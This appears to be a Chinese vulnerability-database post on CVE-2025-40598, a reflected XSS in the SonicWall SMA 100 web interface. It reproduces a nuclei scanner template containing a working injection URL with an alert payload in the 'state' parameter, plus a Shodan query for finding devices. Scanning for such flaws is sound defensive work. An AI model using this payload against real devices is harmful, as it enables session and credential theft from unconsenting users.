SonicWall SMA 100 Web Interface Cross Site Scripting Vulnerability

漏洞信息

漏洞名称: SonicWall SMA 100 Web Interface Cross Site Scripting Vulnerability

漏洞编号:

  • CVE: CVE-2025-40598

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: SonicWall SMA 100系列是一款广泛使用的安全移动接入设备,为企业提供远程访问解决方案。该设备的Web界面存在一个反射型跨站脚本(XSS)漏洞,允许远程未认证攻击者执行任意JavaScript代码。此漏洞的根源在于Web界面未能正确过滤用户输入,导致攻击者可以注入恶意脚本。成功利用此漏洞的攻击者可以在受害者的浏览器上下文中执行任意JavaScript代码,可能导致会话劫持、凭证盗窃或其他恶意活动。由于攻击者需要诱导用户访问特制的URL,因此攻击需要一定的用户交互。尽管如此,此漏洞仍然对使用受影响版本SonicWall SMA 100系列设备的企业构成了中等级别的安全风险。

产品厂商: sonicwall

产品名称: sma_100_firmware

搜索语法: intitle:”sonicwall”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/cda609086d5884205ad349fbfe08d45078db42f2/http%2Fcves%2F2025%2FCVE-2025-40598.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

id: CVE-2025-40598

info:
name: SonicWall SMA 100 - Web Interface Cross Site Scripting
author: watchtowr,DhiyaneshDK
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability exists in the SMA100 series web interface, allowing a remote unauthenticated attacker to potentially execute arbitrary JavaScript code.
impact: |
Successful exploitation could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, credential theft, or other malicious activities.
remediation: |
Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
reference:
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0012
- https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-40598
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
vendor: sonicwall
product: sma_100_firmware
shodan-query: intitle:"sonicwall"
tags: cve,cve2025,xss,sonicwall,sma100

http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/radiusChallengeLogin?portalName=portal1&status=needchallenge&state=\"><img/src=x+onerror=alert`1`>"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><img/src=x+onerror=alert`1`>'
- 'SMA'
condition: and

- type: word
part: content_type
words:
- 'text/html'



SonicWall SMA 100 Web Interface Cross Site Scripting Vulnerability
http://example.com/2025/07/29/github_73216771/
作者
lianccc
发布于
2025年7月29日
许可协议